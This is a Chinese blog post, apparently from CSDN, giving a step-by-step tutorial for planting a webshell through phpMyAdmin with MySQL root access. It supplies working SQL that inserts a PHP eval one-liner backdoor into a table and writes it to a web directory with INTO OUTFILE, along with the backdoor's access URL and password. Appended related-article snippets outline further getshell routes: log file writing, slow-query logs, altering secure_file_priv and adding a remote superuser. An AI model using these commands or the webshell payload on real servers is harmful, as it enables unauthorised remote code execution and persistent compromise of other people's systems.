mysql root拿shell_通过phpmyadmin root权限拿shell

最新推荐文章于 2022-10-25 18:14:10 发布
最新推荐文章于 2022-10-25 18:14:10 发布
阅读量145 收藏
点赞数
文章标签: mysql root拿shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39716703/article/details/113912469
版权

先登录进phpmyadmin root权限进来-----------

Step1  -------->>>>>>点mysql 如图.

20181215191221205289.png

Step 2 -------->>>>>> 点SQL这里

20181215191221531474.png

Step 3 -------->>>>>> 在这里输入sql语句,和一句话木马

20181215191221651596.png

命令如下:

CREATE TABLE `mysql`.`cookie` (`test` TEXT NOT NULL );

INSERT INTO `mysql`.`cookie` (`test` )VALUES (‘<?php @eval($_POST[cookie])?>‘);

SELECT test FROM cookie INTO OUTFILE ‘E:/www/cookie.php‘;

以上语句同时执行,在数据库: mysql 下创建一个表名为:cookie,字段为test,并导出到网站E:/www/cookie.php中

一句话木马的链接就是:    http(s)://网址/cookie.php     密码:cookie

weixin_39716703
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
phpmyadmin getshell的四种方法
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-20 1769
phpmyadmin常见的getshell的几种方法,一共是四种:1、日志文件写 shell2、在知道绝对路径的情况下,利用INTO OUTFILE3、慢查询写入webshell4、创建数据库和表写入webshell: 1、日志文件写 shell(phpmyadmin getshell的四种方法) general_log 默认关闭,开启它可以记录用户输入的每条命令,会把其保存在对应的日志文件中。可以尝试自定义日志文件,并向日志文件里面写入内容的话,那么就可以成功 getshell
phpmyadmin getshell
YouthBelief的博客
11-11 4957
phpmyadmin getshell前言一、into outfile写马条件利用方法操作二、开启日志写马getshell条件利用方法操作三、慢查询webshell利用方法操作四、创建数据库和表写入webshell条件利用方法特殊版本getshell 前言 phpMyadmin是一个以PHP为基础的MySQL数据库管理工具,使网站管理员可通过Web接口管理数据库。 虽然网上有很多公开的文章,也用过很多次了,但自己再总结一遍方便自己查阅。 一、into outfile写马 条件 1.对web目录需要有写权限能
通过phpMyadmin后台获取shell(getshell
qq_46527080的博客
12-07 2307
通过phpMyadmin后台获取shell 前提: 1.要知道靶机的mysql用户名和密码 2.能成功登录到靶机phpmyadmin中 先登入对方phpmyadmin 然后找到执行sql语句的框架 1.开启日志 set global general_log='on' 2.指定日志写入的文件,就是一句话木马写入的路径 set global general_log_file ="C:/php/PHPTutorial/WWW/she.php" 注意:一定注意路径的斜杠一定是/不是复制的路径 查看靶机根目录,发
phpmyadminshell
华丽的贵族
10-29 213
secure_file_priv是一个全局变量,是指定文件夹作为导出文件存放的地方,默认情况是一个空置(NULL); 打开后用into outfile 等函数可以将一句话写入secure_file_priv目录下; 1.把secure_file_priv的值设置为网站根目录: set global secure_file_priv=‘C:\phpStudy/PHPTutorial/WWW’; //...
phpmyadmin常见getshell的方法
Blue的博客
06-10 2474
1、利用条件2、如果满足以上条件可以直接写shell在实际写webshell的时候,我们经常会遭受到secure_file_priv的阻拦,secure_file_priv这个配置参数用来限制load data、outfile、load_file()的使用。在高版本的mysql中默认为NULL,就是不让导入和导出解决办法:在Windows下可在my.ini的[mysqld]里面,添加secure_file_priv=在linux下可在/etc/my.cnf的[mysqld]里面,添加secure_file_
xampp中修改mysql默认空密码(root密码)的方法分享
09-10
总结来说,修改XAMPP中的MySQL root密码和配置phpMyAdmin以使用新密码,主要是通过SQL命令和编辑配置文件实现的。这些步骤虽然简单,但却是保障系统安全的重要一环。记得定期更改密码并保持良好的安全习惯,以防止...
bitnami-docker-phpmyadmin:用于phpMyAdmin的Bitnami Docker映像
04-19
可以通过用户界面执行常用操作(管理数据库,表,列,关系,索引,用户,权限等),而您仍然可以直接执行任何SQL语句。 TL; DR Docker撰写 $ curl -sSL ...
搭建Apache+MySQL+PHP平台.rar_4 3 2 1_Ubuntu搭建_apache2.2.4_php
09-21
PHPmyadmin是一个基于Web的MySQL管理工具,允许用户通过浏览器界面管理数据库。在Apache的配置文件中,添加如下内容到`/etc/apache2/conf-available/phpmyadmin.conf`,将`/usr/share/phpmyadmin`替换为实际的安装...
MySQL8 Ubuntu16.04 64位 懒人安装包
10-10
如果你需要管理数据库,可以使用`mysql`命令行客户端,或者图形化的管理工具如phpMyAdminMySQL Workbench。 总的来说,这个“懒人安装包”是为那些希望快速在Ubuntu 16.04上部署MySQL8的用户设计的,通过一个简单...
vagrant-server:带有 LAMP、phpMyAdmin、ajenti web 面板的 vagrant 上的 CentOs 服务器
06-16
安装包阿帕奇mysql php 5.6 顶麦克多路复用器纳米阿让蒂我的管理员鱼码头工人阿让蒂Ajenti 将在以下位置提供: https://ip:8000 我的管理员对于没有 root 密码的编辑文件: sudo nano /etc/phpmyadmin/config.inc....
利用phpMyAdmin拿webshell
05-01
利用phpMyAdmin拿webshell 利用phpMyAdmin拿webshell
php version 拿shell,总结PHPmyadminshell
weixin_39632379的博客
03-24 188
下面由phpmyadmin使用教程栏目给大家总结phpmyadminshell,希望对需要的朋友有所帮助!PHPmyadminshell总结PHPmyadmin修改用户密码直接点击上面的localhost或者1270.0.1,出现用户一栏,点击修改即可添加超级用户guetsec密码ooxx并且允许外连GRANT ALL PRIVILEGES ON *.* TO 'guetsec'@'%' ID...
phpmyadmin getshell总结
good good study
10-25 3108
phpMyAdmin 是一个用PHP编写的开源软件工具,可以通过web方式控制和操作MySQL数据库。通过phpMyAdmin 可以完全对数据库进行操作,例如建立、复制和删除数据等。
phpMyAdmin(mysql)常见的写shell方法及版本漏洞汇总
m0_48108919的博客
02-21 7922
目录 前言 一、查看phpMyAdmin版本 二、phpmyadmin常见的getshell方法 1.前提 2.网站物理路径获取方法 3.通过into outfile getshell 4.通过日志文件写 shell 5.通过慢查询写shell 6.创建数据库和表写入webshell 总结 前言 phpMyAdmin是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的资料库管理工具 。 一、查看phpMyAdmin版本 phpMyAdmin是有很多公开漏
phpmyadmin拿权限
kzyyx的博客
08-31 771
标题phpmyadmin拿权限 挺垃圾的一个网站通过弱口令root进入后台。 最主要还能直接直行根目录下phpinfo查看网站绝对路径。 1.首先尝试执行outfile语句写入一句话木马 报错显示说是数据库正在运行–secure_file_priv选项,无法执行outfile这个语句。感觉在这个参数上做了限制。 这是secure_file_priv参数的说明。 2.执行show variables like “%secure%”; 查看配置 回显设置为NULL,没有做限制。暂时不知道原因,后续懂了做补
删除了phpmyadmin中的‘root’@‘localhost’用户的处理办法 mac
kongweiji214的博客
03-27 699
删除了phpmyadmin中的‘root’@‘localhost’用户的处理办法 mac
php网站怎么拿shell,phpmyadmin两种拿shell
weixin_39575758的博客
03-17 206
简介phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页...
mysql rootshell_mysql的几种获取shell和提权的方式
weixin_42557537的博客
02-26 629
♥喜欢请点个赞吧♥mysql outfile导出webshell条件:知道物理路径,root权限,同时mysql需要有write权限,secure_file_priv配置不为null,查看方法:show global variables like '%secure_file_priv%';这个参数只能通过修改配置文件后重启mysql修改。1.select '' into outfile 'C:ph...
***学习笔记--场景篇--通过mysqlroot账号来get shell
weixin_33815613的博客
12-13 182
场景介绍: 今天的场景是前一周在内网***的时候遇到过的,找到一个mysql数据库弱口令。 账号和密码分别是root,也就是mysql中的dba。 这里其实权限很大了,首先mysqlroot用户具有文件写权限,同时mysql5.0以上,提供一个system函数,而这个函数通常被***者用作shell的接口。 那时在遇到这个弱口令时,我...
shell脚本安装phpmyadmin
最新发布
06-02
安装phpMyAdmin的方法因操作系统而异,以下是在Linux上安装phpMyAdmin的一般步骤: 1.打开终端并以root身份登录 2.使用包管理器安装PHP(如果尚未安装): - Debian/Ubuntu:apt-get install php - CentOS/Fedora...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值